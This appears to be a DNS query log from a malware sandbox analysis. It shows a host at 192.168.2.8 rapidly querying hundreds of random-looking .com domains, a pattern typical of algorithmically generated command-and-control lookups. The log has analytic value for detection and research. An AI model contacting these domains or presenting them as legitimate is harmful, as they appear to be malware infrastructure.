                                                                                                                                                                                                          Nov 11, 2024 18:24:41.762324095 CET192.168.2.81.1.1.10x84fStandard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.762630939 CET192.168.2.81.1.1.10x3011Standard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.763143063 CET192.168.2.81.1.1.10x4a5fStandard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.763536930 CET192.168.2.81.1.1.10x164dStandard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.764134884 CET192.168.2.81.1.1.10xa8eStandard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.764425993 CET192.168.2.81.1.1.10x1514Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.764614105 CET192.168.2.81.1.1.10xa40aStandard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.764785051 CET192.168.2.81.1.1.10xedceStandard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.764956951 CET192.168.2.81.1.1.10x457fStandard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.765136957 CET192.168.2.81.1.1.10x298dStandard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.775160074 CET192.168.2.81.1.1.10x567bStandard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.775353909 CET192.168.2.81.1.1.10x88c4Standard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.776976109 CET192.168.2.81.1.1.10x7f37Standard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.777720928 CET192.168.2.81.1.1.10x3f78Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.777894020 CET192.168.2.81.1.1.10x2fb2Standard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.778058052 CET192.168.2.81.1.1.10x73a9Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.778228998 CET192.168.2.81.1.1.10x3029Standard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.779032946 CET192.168.2.81.1.1.10xc570Standard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.780883074 CET192.168.2.81.1.1.10xa3eStandard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.781059027 CET192.168.2.81.1.1.10x1f6Standard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.781219006 CET192.168.2.81.1.1.10xfa98Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.781353951 CET192.168.2.81.1.1.10xbb23Standard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.781495094 CET192.168.2.81.1.1.10x3f70Standard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.781673908 CET192.168.2.81.1.1.10x3301Standard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.783907890 CET192.168.2.81.1.1.10x6194Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.784444094 CET192.168.2.81.1.1.10xeb3cStandard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.796566010 CET192.168.2.81.1.1.10xdb87Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.846240044 CET192.168.2.81.1.1.10x680fStandard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.185837984 CET192.168.2.81.1.1.10x18fdStandard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.195139885 CET192.168.2.81.1.1.10xabd4Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.204226017 CET192.168.2.81.1.1.10x3539Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.206624031 CET192.168.2.81.1.1.10xe7caStandard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.207931995 CET192.168.2.81.1.1.10x58daStandard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.207983971 CET192.168.2.81.1.1.10x8c78Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.209291935 CET192.168.2.81.1.1.10x8308Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.215780973 CET192.168.2.81.1.1.10x9accStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.216842890 CET192.168.2.81.1.1.10xf4d9Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.216875076 CET192.168.2.81.1.1.10x2d66Standard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.217446089 CET192.168.2.81.1.1.10x1c5dStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.217634916 CET192.168.2.81.1.1.10x3e78Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.218293905 CET192.168.2.81.1.1.10xdb41Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.218771935 CET192.168.2.81.1.1.10xa940Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.219269037 CET192.168.2.81.1.1.10xf779Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.219660997 CET192.168.2.81.1.1.10x4386Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.254836082 CET192.168.2.81.1.1.10x6f39Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.273113012 CET192.168.2.81.1.1.10xd5d7Standard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.307696104 CET192.168.2.81.1.1.10xf4a8Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.359226942 CET192.168.2.81.1.1.10x2439Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.424685001 CET192.168.2.81.1.1.10x91afStandard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.424966097 CET192.168.2.81.1.1.10xe86eStandard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.526896954 CET192.168.2.81.1.1.10x1162Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.584842920 CET192.168.2.81.1.1.10x4ddeStandard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.585203886 CET192.168.2.81.1.1.10xd130Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.585715055 CET192.168.2.81.1.1.10x632cStandard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.586237907 CET192.168.2.81.1.1.10xf162Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.596128941 CET192.168.2.81.1.1.10xf772Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.609500885 CET192.168.2.81.1.1.10x33c1Standard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.609738111 CET192.168.2.81.1.1.10xcfbStandard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.610291004 CET192.168.2.81.1.1.10xdb56Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.610697985 CET192.168.2.81.1.1.10x1040Standard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.614480019 CET192.168.2.81.1.1.10xc1c1Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615370035 CET192.168.2.81.1.1.10xc481Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615580082 CET192.168.2.81.1.1.10xa6ffStandard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615905046 CET192.168.2.81.1.1.10xf1d0Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.615931034 CET192.168.2.81.1.1.10x9192Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618273973 CET192.168.2.81.1.1.10x6048Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618457079 CET192.168.2.81.1.1.10xc6a3Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.618906975 CET192.168.2.81.1.1.10x626cStandard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.619856119 CET192.168.2.81.1.1.10x8847Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.619908094 CET192.168.2.81.1.1.10x680cStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.622823954 CET192.168.2.81.1.1.10x76caStandard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.633480072 CET192.168.2.81.1.1.10x515fStandard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634042978 CET192.168.2.81.1.1.10xfe85Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634229898 CET192.168.2.81.1.1.10xbbbeStandard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.634382963 CET192.168.2.81.1.1.10xfb63Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.635385990 CET192.168.2.81.1.1.10x529aStandard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.635750055 CET192.168.2.81.1.1.10x6ae6Standard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.636029005 CET192.168.2.81.1.1.10xfdfeStandard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.638153076 CET192.168.2.81.1.1.10x2a74Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.639739990 CET192.168.2.81.1.1.10xc34bStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.653188944 CET192.168.2.81.1.1.10x2278Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656071901 CET192.168.2.81.1.1.10x4cb9Standard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656250000 CET192.168.2.81.1.1.10xe23fStandard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656399012 CET192.168.2.81.1.1.10x823dStandard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656564951 CET192.168.2.81.1.1.10xfbdeStandard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656717062 CET192.168.2.81.1.1.10xb95Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656852961 CET192.168.2.81.1.1.10x571fStandard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.656980991 CET192.168.2.81.1.1.10xc457Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.657118082 CET192.168.2.81.1.1.10x5aeStandard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.657239914 CET192.168.2.81.1.1.10xe9f9Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.658370018 CET192.168.2.81.1.1.10xc969Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:42.674122095 CET192.168.2.81.1.1.10xc267Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.031740904 CET192.168.2.81.1.1.10x6b93Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.045677900 CET192.168.2.81.1.1.10xbccdStandard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.047188044 CET192.168.2.81.1.1.10xb1f7Standard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.063196898 CET192.168.2.81.1.1.10xa47cStandard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.133205891 CET192.168.2.81.1.1.10xaf23Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.158827066 CET192.168.2.81.1.1.10x3087Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.296459913 CET192.168.2.81.1.1.10xc094Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.298794031 CET192.168.2.81.1.1.10x24bStandard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.298990965 CET192.168.2.81.1.1.10xdeb3Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.299664974 CET192.168.2.81.1.1.10x9d3bStandard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.300059080 CET192.168.2.81.1.1.10x4e70Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.300412893 CET192.168.2.81.1.1.10xfbd0Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.300710917 CET192.168.2.81.1.1.10xaa4bStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.301265955 CET192.168.2.81.1.1.10x8a28Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.301717043 CET192.168.2.81.1.1.10xe0cfStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.320455074 CET192.168.2.81.1.1.10xb668Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.321247101 CET192.168.2.81.1.1.10xfb1bStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.322180033 CET192.168.2.81.1.1.10x7e1fStandard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.323142052 CET192.168.2.81.1.1.10xfd35Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.325608015 CET192.168.2.81.1.1.10x8631Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.326273918 CET192.168.2.81.1.1.10x962dStandard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.327100039 CET192.168.2.81.1.1.10x2e56Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.327898026 CET192.168.2.81.1.1.10xea52Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.329479933 CET192.168.2.81.1.1.10xcb5dStandard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.330319881 CET192.168.2.81.1.1.10x958Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.331394911 CET192.168.2.81.1.1.10x2b9dStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.345808029 CET192.168.2.81.1.1.10x51d6Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.346039057 CET192.168.2.81.1.1.10x8e61Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.349245071 CET192.168.2.81.1.1.10xc2cbStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.358503103 CET192.168.2.81.1.1.10x4f01Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.359890938 CET192.168.2.81.1.1.10xe0ebStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360090017 CET192.168.2.81.1.1.10x179aStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360361099 CET192.168.2.81.1.1.10x87d0Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360606909 CET192.168.2.81.1.1.10xd3f2Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360871077 CET192.168.2.81.1.1.10x6db6Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.360905886 CET192.168.2.81.1.1.10x7abbStandard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.361479998 CET192.168.2.81.1.1.10x5e91Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.369472980 CET192.168.2.81.1.1.10x92e2Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.369641066 CET192.168.2.81.1.1.10x5db2Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.369798899 CET192.168.2.81.1.1.10xf230Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370219946 CET192.168.2.81.1.1.10x176bStandard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370455980 CET192.168.2.81.1.1.10x1749Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370502949 CET192.168.2.81.1.1.10x3911Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.370642900 CET192.168.2.81.1.1.10x3be5Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.371402025 CET192.168.2.81.1.1.10x112dStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.371576071 CET192.168.2.81.1.1.10x944dStandard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.375849962 CET192.168.2.81.1.1.10x979eStandard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.376245975 CET192.168.2.81.1.1.10x5d7eStandard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377041101 CET192.168.2.81.1.1.10x3c15Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377204895 CET192.168.2.81.1.1.10xd216Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377443075 CET192.168.2.81.1.1.10xd8e2Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.377599955 CET192.168.2.81.1.1.10x6844Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.378231049 CET192.168.2.81.1.1.10xd57cStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.378700018 CET192.168.2.81.1.1.10xafd3Standard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.378881931 CET192.168.2.81.1.1.10xcd79Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.379050016 CET192.168.2.81.1.1.10xe73bStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.379371881 CET192.168.2.81.1.1.10x1720Standard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.379383087 CET192.168.2.81.1.1.10x9a3eStandard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.386431932 CET192.168.2.81.1.1.10x6db5Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.388056993 CET192.168.2.81.1.1.10xf78eStandard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.400191069 CET192.168.2.81.1.1.10xb368Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.400361061 CET192.168.2.81.1.1.10x181cStandard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.401598930 CET192.168.2.81.1.1.10xf51Standard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:43.535883904 CET192.168.2.81.1.1.10xaa66Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.584309101 CET192.168.2.81.1.1.10x5d5fStandard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.585575104 CET192.168.2.81.1.1.10x64f7Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.592622995 CET192.168.2.81.1.1.10xb079Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.596405029 CET192.168.2.81.1.1.10x2062Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.616463900 CET192.168.2.81.1.1.10xe30fStandard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.634567976 CET192.168.2.81.1.1.10x2600Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.642777920 CET192.168.2.81.1.1.10x6d01Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.648323059 CET192.168.2.81.1.1.10xd84cStandard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.657454967 CET192.168.2.81.1.1.10xecc3Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.658436060 CET192.168.2.81.1.1.10x5be2Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.712241888 CET192.168.2.81.1.1.10xa8abStandard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.716012955 CET192.168.2.81.1.1.10x55b3Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.735788107 CET192.168.2.81.1.1.10x4bc9Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.774337053 CET192.168.2.81.1.1.10xab06Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.776078939 CET192.168.2.81.1.1.10x331Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.778621912 CET192.168.2.81.1.1.10xf048Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823117018 CET192.168.2.81.1.1.10x7f06Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823302031 CET192.168.2.81.1.1.10x3df6Standard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823525906 CET192.168.2.81.1.1.10x7028Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.823684931 CET192.168.2.81.1.1.10xf49Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.838537931 CET192.168.2.81.1.1.10x9b7eStandard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.849483013 CET192.168.2.81.1.1.10x4a2Standard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.850912094 CET192.168.2.81.1.1.10x3f5Standard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.851237059 CET192.168.2.81.1.1.10xe4d7Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.852354050 CET192.168.2.81.1.1.10xad36Standard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.852752924 CET192.168.2.81.1.1.10xdaStandard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.853514910 CET192.168.2.81.1.1.10x2740Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
